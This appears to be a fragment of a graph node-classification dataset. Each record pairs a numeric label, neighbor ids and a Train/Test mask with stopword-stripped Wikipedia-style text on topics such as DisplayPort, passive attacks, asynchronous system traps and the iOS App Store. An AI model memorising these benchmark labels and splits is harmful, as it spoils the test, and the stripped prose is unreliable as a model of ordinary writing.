20 modes vesa encouraging displays use tethered cables speeds rather releasing standalone cables onto market also noted use display stream compression dsc introduced displayport1.4 greatly reduces bandwidth requirements cable formats would normally beyond limits displayport1.4 4k 38402160 144hz 8bpc rgb/4:4:4 31.4gbit/s data rate uncompressed implemented using dsc would reduce physical bandwidth requirements 2–3x placing well within capabilities hbr2-rated cable exemplifies displayport cables classified version although dsc introduced version 1.4 mean needs so-called dp1.4 cable hbr3-rated cable function hbr3 cables required applications exceed hbr2-level bandwidth simply application involving displayport1.4 dsc used reduce bandwidth requirements hbr2 levels hbr2-rated cable sufficient displayport standard specify maximum length cables though displayport 1.2 standard set minimum requirement cables 2 meters length must support hbr2 speeds 21.6gbit/s cables length must support rbr speeds 6.48gbit/s cables greater 2 meters may may support hbr/hbr2 speeds cables length may may support hbr3 speeds displayport cables ports may either full-size connector mini connector connectors differ physical shape—the capabilities displayport regardless connector used using mini displayport connector affect performance feature support connection standard displayport connector referred full-size connector distinguish mini connector sole connector type introduced displayport1.0 20-pin single-orientation connector friction lock optional mechanical latch standard displayport receptacle dimensions 16.10mm width × 4.76mm height × 8.88mm depth standard displayport connector pin allocation follows mini displayport connector developed apple use computer products first announced october 2008 use new macbook pro macbook air cinema display 2009 vesa adopted official standard 2010 specification merged main displayport standard release displayport1.2 apple freely licenses specification vesa mini displayport mdp connector 20-pin single-orientation connector friction lock unlike full-size connector option mechanical latch mdp receptacle dimensions 7.50mm width × 4.60mm height × 4.99mm depth mdp pin assignments full-size displayport connector pin 20 displayport connector called dp_pwr provides 3.3v ±10 dc power 500ma minimum power delivery 1.5w power available displayport receptacles source display devices dp_pwr intended provide power adapters amplified cables similar devices separate power cable necessary standard displayport cable connections use dp_pwr pin connecting dp_pwr pins two devices directly together cable create short circuit potentially damage devices since dp_pwr pins two devices unlikely exactly voltage especially ±10 tolerance reason displayport1.1 later standards specify passive displayport-to-displayport cables must leave pin 20 unconnected however 2013 vesa announced investigating reports malfunctioning displayport devices discovered large number non-certified vendors manufacturing displayport cables dp_pwr pin connected stipulation dp_pwr wire omitted standard displayport cables present displayport1.0 standard however displayport products cables begin appear market 2008 long version 1.0 replaced version 1.1 displayport1.0 standard never implemented commercial products tables describe refresh frequencies achieved transmission mode general maximum refresh frequency determined transmission mode rbr hbr hbr2 hbr3 uhbr 10 uhbr 13.5 uhbr 20 transmission modes introduced displayport standard follows however transmission mode support necessarily dictated device claimed displayport version number example older versions displayport marketing guidelines allowed device labeled displayport 1.2 supported mst feature even n't support hbr2 transmission mode newer versions guidelines removed clause currently june 2018 revision guidelines usage displayport version numbers products displayport version numbers therefore reliable indication transmission speeds device support addition individual devices may arbitrary limitations beyond transmission speed example nvidia kepler gk104 gpus geforce gtx 680 770 support displayport 1.2 hbr2 transmission mode limited 540mpx/s maximum possible hbr2 consequently certain devices may limitations differ listed following tables support particular format source display devices must support required transmission mode displayport cable must also capable handling required bandwidth transmission mode see cables connectors color depth 8bpc 24bit/px 16.7 million colors assumed formats tables standard color depth used computer displays note operating systems refer 32-bit color depth—this 24-bit color depth 8 extra bits alpha channel information present software transmission stage information already incorporated primary color channels actual video data transmitted across cable contains 24 bits per pixel color depth 10bpc 30bit/px 1.07 billion colors assumed formats tables color depth requirement various common hdr standards hdr10 requires 25 bandwidth standard 8bpc video hdr extensions defined version 1.4 displayport standard displays support hdr extensions may implement hbr2 transmission mode extra bandwidth hbr3 unnecessary example 4k 60hz hdr displays since definition constitutes displayport 1.4 device manufacturers may choose label dp 1.2 devices despite support dp 1.4 hdr extensions result displayport version numbers used indicator hdr support displayport dual-mode dp++ also called dual-mode displayport standard allows displayport sources use simple passive adapters connect hdmi dvi displays dual-mode optional feature displayport sources necessarily support dvi/hdmi passive adapters though practice nearly devices officially dp++ logo used indicate dp port supports dual-mode modern devices use logo devices implement dual-mode detect dvi hdmi adapter attached send dvi/hdmi tmds signals instead displayport signals original displayport dual-mode standard version 1.0 used displayport1.1 devices supported tmds clock speeds 165mhz 4.95gbit/s bandwidth equivalent hdmi1.2 sufficient 19201080 19201200 60hz 2013 vesa released dual-mode 1.1 standard added support 300mhz tmds clock 9.00gbit/s bandwidth used newer displayport1.2 devices slightly less 340mhz maximum hdmi1.4 sufficient 19201080 120hz 25601440 60hz 38402160 30hz older adapters capable 165mhz speed retroactively termed type1 adapters new 300mhz adapters called type2 release displayport1.3 standard vesa added dual-mode support 600mhz tmds clock 18.00gbit/s bandwidth full bandwidth hdmi2.0 sufficient 19201080 240hz 25601440 144hz 38402160 60hz however passive adapters capable 600mhz dual-mode speed produced 2018 multi-stream transport feature first introduced displayport1.2 standard allows multiple independent displays driven single dp port source devices multiplexing several video streams single stream sending branch device demultiplexes signal original streams branch devices commonly found form mst hub plugs single dp input port provides multiple outputs also implemented display internally provide dp output port daisy-chaining effectively embedding 2-port mst hub inside display.. theoretically 63 displays supported combined data rate requirements displays exceed limits single dp port 17.28gbit/s dp1.2 port 25.92gbit/s dp 1.3/1.4 port addition maximum number links source device i.e maximum length daisy-chain 7 maximum number physical output ports branch device hub 7 release mst standard single-display operation retroactively named sst mode single-stream transport daisy-chaining feature must specifically supported intermediary display displayport1.2 devices support daisy-chaining requires dedicated displayport output port display standard displayport input ports found displays used daisy-chain output last display daisy-chain need support feature specifically dp output port displayport1.1 displays also connected mst hubs part displayport daisy-chain last display chain host system software also needs support mst hubs daisy-chains work microsoft windows environments full support apple operating systems currently support mst hubs displayport daisy-chaining macos 10.13 high sierra displayport-to-dvi displayport-to-hdmi adapters/cables may may function mst output port support depends specific device mst supported usb type-c displayport alternate mode standard displayport daisy-chains mst hubs function type-c sources simple type-c displayport adapter support hdr video introduced displayport1.4 implements cta 861.3 standard transport static hdr metadata edid displayport1.0 includes optional dpcp displayport content protection philips uses 128-bit aes encryption also features full authentication session key establishment encryption session independent independent revocation system portion standard licensed separately also adds ability verify proximity receiver transmitter technique intended ensure users bypassing content protection system send data distant unauthorized users displayport1.1 added optional implementation industry-standard 56-bit hdcp high-bandwidth digital content protection revision 1.3 requires separate licensing digital content protection llc displayport1.3 added support hdcp2.2 also used hdmi2.0 vesa creators displayport standard state standard royalty-free implement however march 2015 mpeg la issued press release stating royalty rate 0.20 per unit applies displayport products manufactured sold countries covered one patents mpeg la license pool includes patents hitachi maxell philips lattice semiconductor rambus sony response vesa updated displayport faq page following statement october 2017 still seems royalty according vesa official faq standard may require per-device royalty fees vesa requires membership access said standards minimum cost presently 5,000 december 2010 several computer vendors display makers including intel amd dell lenovo samsung lg announced would begin phasing fpd-link vga dvi-i next years replacing displayport hdmi one notable exception list manufacturers nvidia yet announce plans regarding future implementation legacy interfaces displayport several advantages vga dvi fpd-link although displayport much functionality hdmi complementary connection used different scenarios dual-mode displayport port emit hdmi signal via passive adapter figures idc show 5.1 commercial desktops 2.1 commercial notebooks released 2009 featured displayport main factor behind phase-out vga intel amd planned stop building products fpd-link 2013 nearly 70 lcd monitors sold august 2014 us uk germany japan china equipped hdmi/displayport technology 7.5 year according digitimes research ihs markit analytics firm forecast displayport would surpass hdmi 2019 mini displayport mdp standard announced apple fourth quarter 2008 shortly announcing mini displayport apple announced would license connector technology fee following year early 2009 vesa announced mini displayport would included upcoming displayport 1.2 specification 24 february 2011 apple intel announced thunderbolt successor mini displayport adds support pci express data connections maintaining backwards compatibility mini displayport based peripherals micro displayport would targeted systems need ultra-compact connectors phones tablets ultra-portable notebook computers standard would physically smaller currently available mini displayport connectors standard expected released q2 2014 project seems aborted replaced displayport alt mode usb type-c standard direct drive monitor ddm 1.0 standard approved december 2008 allows controller-less monitors display panel directly driven displayport signal although available resolutions color depth limited two-lane operation display stream compression dsc vesa-developed low-latency compression algorithm overcome limitations posed sending high-resolution video physical media limited bandwidth visually lossless low-latency algorithm based delta pcm coding ycocg-r color space allows increased resolutions color depths reduced power consumption dsc tested meet requirements iso/iec 29170-2 evaluation procedure nearly lossless coding using various test patterns noise subpixel-rendered text cleartype ui captures photo video images dsc version 1.0 released 10 march 2014 soon deprecated dsc version 1.1 released 1 august 2014 dsc standard supports 3:1 compression ratio constant variable bit rate 4:4:4 chroma subsampling optional 4:2:2 conversion 6/8/10/12 bits per color component dsc version 1.2 released 27 january 2016 included displayport 1.4 version 1.2a released 18 january 2017 update includes native encoding 4:2:2 4:2:0 formats pixel containers 14/16 bits per color minor modifications encoding algorithm dsc compression works horizontal line pixels encoded using groups three consecutive pixels native 4:4:4 simple 4:2:2 formats six pixels three compressed containers native 4:2:2 4:2:0 formats rgb encoding used first converted reversible ycgco simple conversion 4:2:2 4:4:4 add missing chroma samples interpolating neighboring pixels luma component coded separately using three independent substreams four substreams native 4:2:2 mode prediction step performed using one three modes modified median adaptive coding mmap algorithm similar one used jpeg-ls block prediction optional decoders due high computational complexity negotiated dsc handshake midpoint prediction bit rate control algorithm tracks color flatness buffer fullness adjust quantization bit depth pixel group way minimizes compression artifacts staying within bitrate limits repeating recent pixels stored 32-entry indexed color history ich buffer referenced directly group slice improves compression quality computer-generated images alternatively prediction residuals computed encoded entropy coding algorithm based delta size unit-variable length coding dsu-vlc encoded pixel groups combined slices various height width common combinations include 100 25 picture width 8- 32- 108-line height 4 january 2017 hdmi 2.1 announced supports 10k resolution uses dsc 1.2 video higher 8k resolution 4:2:0 chroma subsampling embedded displayport edp display panel interface standard portable embedded devices defines signaling interface graphics cards integrated displays various revisions edp based existing displayport standards however version numbers two standards interchangeable instance edp version 1.4 based displayport 1.2 edp version 1.4a based displayport 1.3 practice embedded displayport displaced lvds predominant panel interface modern laptops edp 1.0 adopted december 2008 included advanced power-saving features seamless refresh rate switching version 1.1 approved october 2009 followed version 1.1a november 2009 version 1.2 approved may 2010 includes displayport 1.2 hbr2 data rates 120hz sequential color monitors new display panel control protocol works aux channel version 1.3 published february 2011 includes new optional panel self-refresh psr feature developed save system power extend battery life portable pc systems psr mode allows gpu enter power saving state frame updates including framebuffer memory display panel controller version 1.4 released february 2013 reduces power consumption partial-frame updates psr mode regional backlight control lower interface voltages additional link rates auxiliary channel supports multi-touch panel data accommodate different form factors version 1.4a published february 2015 underlying displayport version updated 1.3 order support hbr3 data rates display stream compression 1.1 segmented panel displays partial updates panel self-refresh version 1.4b published october 2015 protocol refinements clarifications intended enable adoption edp 1.4b devices mid-2016 internal displayport idp 1.0 approved april 2010 idp standard defines internal link digital tv system chip controller display panel timing controller aims replace currently used internal fpd-link lanes displayport connection idp features unique physical interface protocols directly compatible displayport applicable external connection however enable high resolution refresh rates providing simplicity extensibility idp features non-variable 2.7ghz clock nominally rated 3.24gbit/s data rate per lane sixteen lanes bank resulting six-fold decrease wiring requirements fpd-link 1080p24 signal data rates also possible idp built simplicity mind n't aux channel content protection multiple streams however frame sequential line interleaved stereo 3d portable digital media interface pdmi interconnection docking stations/display devices portable media players includes 2-lane displayport v1.1a connection ratified february 2010 ansi/cea-2017-a wireless displayport wdp enables displayport 1.2 bandwidth feature set cable-free applications operating 60ghz radio band announced november 2010 wigig alliance vesa cooperative effort slimport brand analogix products complies mobility displayport also known mydp industry standard mobile audio/video interface providing connectivity mobile devices external displays hdtvs slimport implements transmission video 4k-ultrahd eight channels audio micro-usb connector external converter accessory display device slimport products support seamless connectivity displayport hdmi vga displays mydp standard released june 2012 first product use slimport google nexus 4 smartphone lg smartphones lg g series also adopted slimport slimport alternative mobile high-definition link mhl displayid designed replace e-edid standard displayid features variable-length structures encompass existing edid extensions well new extensions 3d displays embedded displays latest version 1.3 announced 23 september 2013 adds enhanced support tiled display topologies allows better identification multiple video streams reports bezel size locations december 2013 many current 4k displays use tiled topology lack standard way report video source tile left right early 4k displays manufacturing reasons typically use two 1920×2160 panels laminated together currently generally treated multiple-monitor setups displayid 1.3 also allows 8k display discovery applications stereo 3d multiple video streams used dockport formerly known lightning bolt extension displayport include usb 3.0 data well power charging portable devices attached external displays originally developed amd texas instruments announced vesa specification 2014 22 september 2014 vesa published displayport alternate mode usb type-c connector standard specification send displayport signals newly released usb-c connector one two four differential pairs usb uses superspeed bus configured dynamically used displayport lanes first two cases connector still carry full superspeed signal latter case least non-superspeed signal available displayport aux channel also supported two sideband signals connection furthermore usb power delivery according newly expanded usb-pd 2.0 specification possible time makes type-c connector strict superset use-cases envisioned dockport slimport mini micro displayport virtuallink uses usb-c connectors displayport transmit video signals since introduction 2006 displayport gained popularity within computer industry featured many graphic cards displays notebook computers dell first company introduce consumer product displayport connector dell ultrasharp 3008wfp released january 2008 soon amd nvidia released products support technology amd included support radeon hd 3000 series graphics cards nvidia first introduced support geforce 9 series starting geforce 9600 gt later year apple introduced several products featuring mini displayport new connector – proprietary time – eventually became part displayport standard however apple reserves right void license licensee commence action patent infringement apple 2009 amd followed suit radeon hd 5000 series graphics cards featured mini displayport eyefinity versions series nvidia launched nvs 810 8 mini displayport outputs single card 4 november 2015 nvidia revealed geforce gtx 1080 world first graphics card displayport 1.4 support 6 may 2016 amd followed radeon rx 480 support displayport 1.3/1.4 29 june 2016 radeon rx 400 series support displayport 1.3 hbr hdr10 dropping dvi connector reference board design february 2017 vesa qualcomm announced displayport alt mode video transport integrated snapdragon 835 mobile chipset powers smartphones vr/ar head-mounted displays ip cameras tablets mobile pcs following organizations hold active patents contributed towards development displayport technology listed patent pool mpeg la following companies participated preparing drafts displayport edp idp ddm dsc standards following companies additionally announced intention implement displayport edp idp",
    "neighbors": [
      3457,
      3586,
      9475,
      11524,
      10375,
      5384,
      780,
      6797,
      9741,
      11405,
      2706,
      7442,
      533,
      11417,
      11546,
      2594,
      8355,
      9122,
      10019,
      7594,
      7086,
      6575,
      11183,
      6705,
      2994,
      9137,
      1463,
      9400,
      6978,
      3140,
      7108,
      10954,
      1998,
      2383,
      9551,
      7122,
      9427,
      4567,
      10971,
      3548,
      1501,
      9438,
      7647,
      9056,
      9057,
      10337,
      5859,
      2277,
      5606,
      6632,
      9321,
      876,
      7151,
      1776,
      4465,
      6001,
      9970,
      11631,
      1400,
      5883,
      3453
    ],
    "mask": "Test"
  },
  {
    "node_id": 9058,
    "label": 4,
    "text": "Passive_attack:passive attack passive attack cryptosystem one cryptanalyst interact parties involved attempting break system solely based upon observed data i.e ciphertext also include known plaintext attacks plaintext corresponding ciphertext known classical ciphers vulnerable form attack modern ciphers designed prevent type attack others main types passive attacks traffic analysis release message contents traffic analysis attack eavesdropper analyzes traffic determines location identifies communicating hosts observes frequency length exchanged messages uses information predict nature communication incoming outgoing traffic network analyzed altered release message content telephonic conversation e-mail message transferred file may contain confidential data passive attack monitors contents transmitted data passive attacks difficult detect involve alteration data messages exchanged neither sender receiver aware third party may capture messages prevented encryption data",
    "neighbors": [
      9156,
      612,
      1797,
      3629,
      11119,
      4689
    ],
    "mask": "None"
  },
  {
    "node_id": 9059,
    "label": 4,
    "text": "Eric_Vanderburg:eric vanderburg eric vanderburg american cyber security storage networking information technology professional writer living cleveland ohio vanderburg vice president cybersecurity tcdi author speaker information security interviewed tv radio discuss information security presents conferences seminars participated panels information security vanderburg attended kent state university earning bachelor science technology masters business administration also master business administration mba pursued doctorate information assurance vanderburg interested technology early age often reading computer manuals library thus allowing learn basics programming spending time hackers internet deviants early 1990s managed turn interest security career since late 1990s interest primarily cybersecurity within business world also spoken development devops business world vanderburg founded independent systems consulting consulting firm 1997 ran almost ten years joined jurinnov 2006 directed digital forensics cybersecurity consulting teams 2009 built network operations center jurinnov headquarters monitor data center operations perform transaction monitoring key business client systems 2016 vanderburg became vice president cybersecurity tcdi tcdi acquired jurinnov also techmin network board member vanderburg involved hitachi data systems testing essential nas product compared netapp fas3000 nas partnered lateral data using viewpoint ediscovery tool perform large-scale litigation document review worked venio litigation review tool early case assessment eca worked companies including dell carbonite bitdefender microsoft vanderburg served expert witness cases involving digital preservation electronic communication access control confidential information disclosure database management systems directory services vanderburg taught courses security database management systems computer networking remington college cleveland-west campus instructor chair computer networking technology program served adjunct instructor computer information systems department lorain county community college elyria ohio vanderburg delivered commencement speeches vatterott college cleveland campus 2010 commencement remington college cleveland-west campus final graduation 2013 also taught web-based courses professional development eforensics magazine vanderburg served advisory boards remington college vatterott college lincoln school technology cuyahoga community college workforce economic development division wedd vanderburg published cio magazine eforensics magazine network world computer world networks asia certification magazine pc security world cso magazine arn techworld mcgladrey technology news brief vanderburg also maintains blog called security thinking cap",
    "neighbors": [
      1400,
      2737
    ],
    "mask": "Test"
  },
  {
    "node_id": 9060,
    "label": 2,
    "text": "Asynchronous_System_Trap:asynchronous system trap asynchronous system trap ast refers mechanism used several computer operating systems designed former digital equipment corporation dec maynard massachusetts various events within systems optionally signalled back user processes via ast mechanism asts act like subroutine calls delivered asynchronously without regard context main thread care must taken asts commonly encountered result issuing qio calls kernel completion i/o signalled issuance ast calling process/task certain runtime errors could also signalled using ast mechanism within openvms special kernel-mode asts used standard mechanism getting access process context executed highest possible per-process priority next time scheduler makes process current used among things retrieving process-level information response getjpi getjob/process information system call performing process deletion following operating systems implement asts asts roughly analogous unix signals important differences vax/vms v4 later implemented interesting optimization problem synchronizing ast-level non-ast-level code system service named setast could used disable enable delivery asts current less-privileged access modes openvms term ring-based security features however critical section needing protection asts instructions long overhead making setast calls could far outweigh time execute instructions user mode least privileged ring normally used ordinary user programs pair bit flags provided predefined user-writable memory location per-process p1 space meanings two flags could construed n't deliver asts asts disabled instead usual pair setast calls user-mode code would set first flag executing sequence instructions asts need blocked clear sequence note ordering avoid race conditions would check second flag see become set time asts really become disabled setast called re-enable common case asts would become pending time would need call setast kernel ast delivery code part would check first flag trying deliver user-mode ast set would directly set asts-disabled bit process control block bit would set explicit setast call user mode also set second flag returning leaving ast undelivered asynchronous procedure call mechanism windows nt family operating systems similar mechanism",
    "neighbors": [
      10590,
      6184,
      9224,
      7983,
      8976,
      5492,
      6837,
      3326
    ],
    "mask": "Test"
  },
  {
    "node_id": 9061,
    "label": 4,
    "text": "Security_type_system:security type system computer science type system described syntactic framework contains set rules used assign type property int boolean char etc various components computer program variables functions security type system works similar way main focus security computer program information flow control thus various components program assigned security types labels aim system ultimately able verify given program conforms type system rules satisfies non-interference security type systems one many security techniques used field language-based security tightly connected information flow information flow policies simple terms using security type system want detect exists kind violation confidentiality integrity program i.e want detect program line information flow policy suppose two users b program introduce following security classes sc information flow policy want define direction information allowed flow dependent whether specifying policy read write operations example consider read operations confidentiality define following flows allowed also described superset ⊇ words information allowed flow towards stricter levels confidentiality using combination operator ⊕ express security classes perform read operations respect security classes example also described intersection ∩ security classes information flow policy illustrated hasse diagram also want policy lattice greatest lower-bound least upper-bound always exists combination security classes case integrity information flow opposite direction thus policy inverted policy place software developer apply security classes program components use security type system usually combined compiler perform verification information flow according type system rules sake simplicity consider simple computer program together information flow policy described previous section simple program given following pseudocode codice_1 see equality check made variable assigned security class see variable x lower security class b influenced check means information leaking class class b violation confidentiality policy leak detected security type system order design security type system need formalize couple things first need function also known security environment creates mapping variables security types classes denote function γ γ x τ x variable τ security class type assign security classes also called judgement program components using following notation use following bottom-up notation decompose program program decomposed trivial judgements easily determine type work way obtain types less trivial parts program consider numerator isolation looking types statement see able derive allowed type denominator based defined type system rules main part security type system rules say decompose program type verification performed toy program consists conditional test two possible variable assignments rules two events defined follows applying simple program introduced get type system detects policy violation line 2 read operation security class performed followed two write operations less strict security class b formalized terms ⋢ b b rule conditional test thus program classified typeable soundness security type system informally defined program p well typed p satisfies non-interference",
    "neighbors": [
      3624,
      5060
    ],
    "mask": "Train"
  },
  {
    "node_id": 9062,
    "label": 9,
    "text": "Semantic_analysis_(compilers):semantic analysis compilers semantic analysis context sensitive analysis process compiler construction usually parsing gather necessary semantic information source code usually includes type checking makes sure variable declared use impossible describe extended backus–naur form thus easily detected parsing",
    "neighbors": [
      1952,
      5635,
      1956,
      3624,
      7634,
      5399
    ],
    "mask": "Test"
  },
  {
    "node_id": 9063,
    "label": 2,
    "text": "App_Store_(iOS):app store ios app store digital distribution platform developed maintained apple inc. mobile apps ios operating system store allows users browse download apps developed apple ios software development kit apps downloaded iphone smartphone ipod touch handheld computer ipad tablet computer transferred apple watch smartwatch 4th-generation newer apple tvs extensions iphone apps app store opened july 10 2008 initial 500 applications available store features 2.1 million apps developers multiple options monetizing applications ranging free free in-app purchases paid however app store criticized lackluster development environment prompting company june 2016 announce renewed focus energy store major changes introduced following months include ads search results new app subscription model ability developers respond customer reviews additionally apple began process remove old apps function intended n't follow current app guidelines app research firms noticing significant numbers app removals store furthermore release ios 11 september 2017 app store received complete design overhaul bringing greater focus editorial content daily highlights well design similar style several apple built-in ios apps iphone app store opened july 10 2008 july 11 iphone 3g released came pre-loaded support app store success apple app store launch similar services competitors term app store adopted refer similar service mobile devices however apple applied u.s. trademark term app store 2008 tentatively approved early 2011 june 2011 u.s. district judge phyllis hamilton presiding apple case amazon said would probably deny apple motion stop amazon using app store name july apple denied preliminary injunction amazon appstore federal judge term app become popular buzzword january 2011 app awarded honor 2010 word year american dialect society app used shorthand application since least mid-1990s product names since least 2006 example then-named google apps apple announced mac app store similar app distribution platform macos personal computer operating system october 2010 official launch taking place january 2011 release 10.6.6 snow leopard update february 2013 apple informed developers could begin using appstore.com links apps june developer conference apple announced upcoming kids section app store new section featuring apps categorized age range section launched alongside release ios 7 september 2013 november 2014 due pressure european commission apple updated app store apps charge download labeled get instead previous free due many free apps inclusions paid in-app purchases january 2017 reports surfaced documentation new beta then-upcoming release ios 10.3 detailed apple would let developers respond customer reviews app store marking significant change previous limitation prevented developers communicating users functionality officially enabled march 27 2017 ios 10.3 released users details also released reviews users including able rate review apps apps rather redirected app store mark users reviews helpful helpful apple published document describing proper ways respond developers including timely clear concise prioritize certain forms reviews low-star ratings certain countries recent reviews filtering itunes connect developer responses go approval process published developers also forbidden manipulating incenting feedback developer responses listed app store line underneath respective user review users receive notification/email upon response respective developer option update review march 2017 app store submissions containing pricing details free name started getting rejected developers previously advised developer guides itunes connect app store overview pages refrain practice though apps still approved starting march though apps free titles rejected october 2016 effort improve app discoverability apple rolled ability developers purchase advertising spots app store users united states ads shown top search results based strictly relevant keywords used create profiles users apple expanded search ads united kingdom australia new zealand april 2017 along configurable advertising settings developers search ads expanded canada mexico switzerland october 2017 december 2017 apple revamped search ads program offer two distinctive versions search ads basic pay-per-install program aimed smaller developers pay users actually install app search ads basic also features easier setup process restricted monthly budget search ads advanced new name given older method developers pay whenever users tap apps search results along unlimited monthly budgets launch basic program available u.s. international rollout expected sometime next year apple also offers itunes affiliate program lets people refer others apps itunes content along in-app purchases percentage sales commission rate in-app purchases reduced 7 2.5 may 2017 affiliate rates paid apps music movies books tv shows remained 7 app store received major design overhaul release ios 11 new design features greater focus editorial content daily highlights introduces cleaner consistent colorful look similar several apple built-in ios apps prior september 2017 apple offered way users manage ios app purchases itunes computer software september version 12.7 itunes released removing app store section process however following month itunes 12.6.3 also released retaining app store 9to5mac noting secondary release positioned apple necessary businesses performing internal app deployments december 2017 apple announced developers could offer applications pre-order letting make apps visible store 2–90 days ahead release january 4 2018 apple announced app store record-breaking holiday season according new press release week starting christmas eve record number customers made app store purchases spending 890 million seven-day period new year day 2018 alone customers made 300 million purchases ios sdk software development kit allows development mobile apps ios originally developing iphone prior unveiling 2007 apple then-ceo steve jobs intend let third-party developers build native apps ios instead directing make web applications safari web browser however backlash developers prompted company reconsider jobs announcing october 2007 apple would software development kit available developers february 2008 sdk released march 6 2008 sdk free download users mac personal computers available microsoft windows pcs sdk contains sets giving developers access various functions services ios devices hardware software attributes also contains iphone simulator mimic look feel device computer developing new versions sdk accompany new versions ios order test applications get technical support distribute apps app store developers required subscribe apple developer program combined xcode ios sdk helps developers write ios apps using officially supported programming languages including swift objective-c. companies also created tools allow development native ios apps using respective programming languages publish apps app store developers must pay 99 yearly fee access apple developer program apple announced united states 2018 waive fee nonprofit organizations governments developers options monetizing applications free model enables free apps increasing likelihood engagement freemium model makes app download free users offered optional additional features in-app require payments subscription model enables ongoing monetization renewable transactions paid model makes app paid download offers additional features paymium model enables paid app downloads paid in-app content in-app subscriptions originally introduced magazines newspapers music apps february 2011 giving developers 70 revenue earned apple 30 publishers could also sell digital subscriptions website bypassing apple fees allowed advertise website alternative apps 2016 multiple media outlets reported apps decreased significantly popularity recode wrote app boom editorial techcrunch stated air hopelessness surrounds mobile app ecosystem obvious demoralizing verge wrote original app store model selling apps buck two looks antiquated issues included consumer boredom lack app discoverability stated report 2014 lack new app downloads among smartphone users interview verge june 2016 phil schiller apple senior vice president worldwide marketing said apple renewed focus energy app store announced multiple significant changes including advertisements search results new app subscription model subscription model saw firmly established 70/30 revenue split developers apple change new 85/15 revenue split user stays subscribed developer app year opens possibility subscriptions apps select categories app data insights analyst company app annie released report october 2016 announcing china overtaken united states apple biggest market app store revenue third quarter 2016 chinese users spent 1.7 billion vs. approximately 1.5 billion american users june 2017 apple announced app store generated 70 billion revenue developers since 2008 launch july 10 2008 apple then-ceo steve jobs told usa today app store contained 500 third-party applications iphone ipod touch 25 percent free ten million applications downloaded first weekend september number available apps increased 3,000 100 million downloads years store surpassed multiple major milestones including 50,000 100,000 250,000 500,000 1 million 2 million apps billionth application downloaded april 24 2009 ipad released april 2010 approximately 3,000 apps available july 2011 16 months release 100,000 apps available designed specifically device apple publishes list yearly basis giving credit apps highest number downloads past year most-downloaded ios applications highest revenue generating ios applications time 2010-2018 apple rates applications worldwide based content determines age group appropriate according iphone os 3.0 launch event iphone allow blocking objectionable apps iphone settings following ratings apple detailed applications subject approval apple outlined sdk agreement basic reliability testing analysis applications may still distributed ad-hoc rejected author manually submitting request apple license application individual iphones although apple may withdraw ability authors later date apple employed mostly static analysis app review process means dynamic code reassembly techniques could defeat review process june 2017 apple updated app store review guidelines specify app developers longer ability use custom prompts encouraging users leave reviews apps release ios 11 late 2017 apple also let developers choose whether keep current app reviews updating apps reset additionally another update app store policies allows users optionally tip content creators voluntarily sending money november 2012 boyfriend maker dating sim game removed due reports references violent sexual acts paedophilia deemed inappropriate boyfriend maker age rating 4+ revised version called boyfriend plus approved apple april 2013 march 2013 hiddenapps approved appeared app store app provided access developer diagnostic menus allowed stock apps hidden enabled opt-out feature iads apple developer-driven advertisement system app removed shortly afterwards violating guidelines april 2013 apple removed appgratis then-successful app store market promoted paid apps offering one free day apple told things digital app violated two developer agreement clauses including apps display apps purchase promotion manner similar confusing app store rejected apps use push notifications send advertising promotions direct marketing kind apple however tell developers welcome resubmit changing app though much hope could survive anything like current incarnation november 2014 apple removed marijuana social networking app massroots reason given encourage excessive consumption alcohol illegal substances. ” february 2015 massroots reintroduced store apple changed enforcement guidelines allow cannabis social apps 23 states legal september 2015 discovered hundreds apps submitted approved app store using xcodeghost malicious version xcode development software issues prompted apple remove infected apps store issue statement working developers make sure ’ using proper version xcode security firm later published lists infected apps including china-only version angry birds 2 camcard lifesmart tinydeal.com wechat aftermath apple stated would make xcode faster download certain regions outside united states contacted developers ensure download code mac app store apple website provided code signature developers test running tampered version xcode june 2017 scamming trend discovered store developers make apps built non-existent services attach in-app purchase subscriptions opening dialogue buy app store search advertising space get app higher rankings one instance app name mobile protection clean security vpn would require payments 99.99 seven-day subscription short trial apple yet responded issues addition apple removed software licensed gnu general public license gpl app store due text apple terms service agreement imposing digital rights management proprietary legal terms incompatible terms gpl september 1 2016 apple announced starting september 7 would removing old apps function intended n't follow current review guidelines developers warned given 30 days update apps apps crash startup removed immediately additionally app names registered developers exceed 50 characters attempt stop developers inserting long descriptions irrelevant terms app names improve app ranking app store search results app intelligence firm sensor tower revealed november 2016 apple promised september announcement removing old apps removed 47,300 apps app store october 2016 238 percent increase prior number average monthly app removals june 2017 techcrunch reported apple turned app removal focus apps copying functionality popular apps example cited included popular game like flappy bird red ball hits charts hundreds thousands clones within weeks attempt capitalize initial wave popularity report also noted removals music apps serving pirated tracks publication wrote since initial september app removals began apple removed multiple hundreds thousands apps december 2017 new report techcrunch stated apple begun enforcing new restrictions use commercialized template app generation services originally introduced part apple 2017 developer conference new app store guidelines allow company ban apps making use templates commercial app services affected many small businesses techcrunch report citing local retailers restaurants small fitness studios nonprofits churches organizations benefit using templates app services due minimal costs developers received notice apple january 1 2018 deadline change respective apps news caught attention congress congressman ted lieu writing letter apple beginning december asking reconsider writing understanding many small businesses research organizations religious institutions rely template apps possess resources develop apps in-house new rules cast wide net specifically invalidating apps longstanding legitimate developers pose threat app store ’ integrity additionally news stricter enforcement caused significant criticism app development firms one company told techcrunch chose close business following news saying 4.2.6 rule enforcement final drop made us move bit faster decision close another company told publication way june guidelines changed would said ‘ ’ going target apps ... apple told us ’ targeted quality standpoint hit umbrella spam shocking every quality developer good actors furthermore latter company stated ’ much apps perform utility – ordering food third company said rule 4.2.6 concrete illustration danger apple ’ dominant position fourth said ’ wiped pretty much entire industry diy tools like appmakr also development suites like titanium towards end year apple updated guideline clarify companies organizations allowed use template apps long directly publish app remained violation rule commercial app services publish apps respective clients january 2017 apple complied request chinese government remove chinese version new york times app followed government efforts 2012 block times website stories hidden wealth among family members then-leader china wen jiabao published statement apple spokesperson told media informed app violation local regulations though would specify regulations added result app must taken china app store situation changes app store offer new york times app download china following july reported apple begun remove listings china apps circumvent government internet censorship policies new laws restricting virtual private network vpn services apple issued statement explaining app removals result developers complying new laws china requiring government license businesses offering vpns apps remain available markets business earnings call following month cook elaborated recent news explainining would obviously rather remove apps like countries follow law wherever business besides vpn services number internet calling apps including microsoft skype also removed chinese app store 2017 apple telling new york times similar vpn apps new apps also violated local law microsoft explained bbc news skype app temporarily removed working reinstate app soon possible though many news outlets reported chinese government increased efforts pressure crack internet freedom following apple ceo tim cook appearance china world internet conference december 2017 cook stated apple china share vision developing digital economy openness shared benefits free speech human rights activists criticized cook company maya wang human rights watch told washington post cook ’ appearance lends credibility state aggressively censors internet throws people jail critical social ills building artificial intelligence systems monitors everyone targets dissent ... version cyberspace 